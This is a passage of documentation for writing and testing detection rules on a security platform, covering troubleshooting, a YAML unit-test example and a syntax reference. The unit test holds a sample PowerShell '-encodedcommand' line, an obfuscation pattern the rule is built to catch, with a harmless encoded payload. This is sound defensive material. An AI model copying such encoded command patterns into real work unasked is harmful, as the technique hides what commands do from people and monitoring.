• Confirm operator parameters are correct (e.g., re: not value: for matches).
• Ensure the target: is correct for the data source.

False Positives

• Add contextual filters (is tagged, times, platform operators).
• Use FP rules in the fp Hive rather than making the detection more complex.
• Add suppression to manage volume.
• Refine detection specificity (e.g., is with file name: true instead of contains).

Template Errors

• Validate Go template syntax.
• Remember that report templates operate on the detection context (.detect.event.*), not the raw event (.event.*).
• Use conditional logic for optional fields: {{ if .event.FIELD }}{{ .event.FIELD }}{{ end }}.
• Test secret and variable references are properly configured.

Unit Testing

Use the built-in testing framework to validate rule logic. Tests run automatically when rules are created or updated — if tests fail, the rule will not be deployed.

tests:
  match:
    - - event:
          FILE_PATH: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          COMMAND_LINE: powershell -encodedcommand ZQBjaABvACAAIgBoAGUAbABsAG8AIgA=
        routing:
          event_type: NEW_PROCESS
          hostname: test-host
          plat: 268435456
          arch: 2
  non_match:
    - - event:
          FILE_PATH: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          COMMAND_LINE: powershell -command Get-Process
        routing:
          event_type: NEW_PROCESS
          hostname: test-host
          plat: 268435456
          arch: 2

Key points:

• match contains tests that should trigger the rule.
• non_match contains tests that should NOT trigger the rule.
• Each test is a list of events (to support stateful rules with multiple events).
• Events must include both event and routing objects.
• Platform values in routing/plat are numeric (e.g., 268435456 for Windows).

---

Quick Reference

Feature	Correct Syntax	Common Mistake
Regex pattern	re: pattern	value: pattern
CIDR range	cidr: 10.0.0.0/8	value: 10.0.0.0/8
String distance max	max: 2	distance: 2
Age check	seconds: 3600	value: "1h"
Scope sub-rule	rule: (singular)	rules: (plural)
Wait duration	duration: 10s	seconds: 10
Extension call	extension name: / extension action: / extension request:	extension: / action: / data:
Output target	name: my-output	outputs: [...]
Test negative cases	non_match:	not_match:
Negation	not: true (parameter)	op: not (standalone)
Platform check	op: is platform + name: windows	N/A (shorthand op: is windows also works)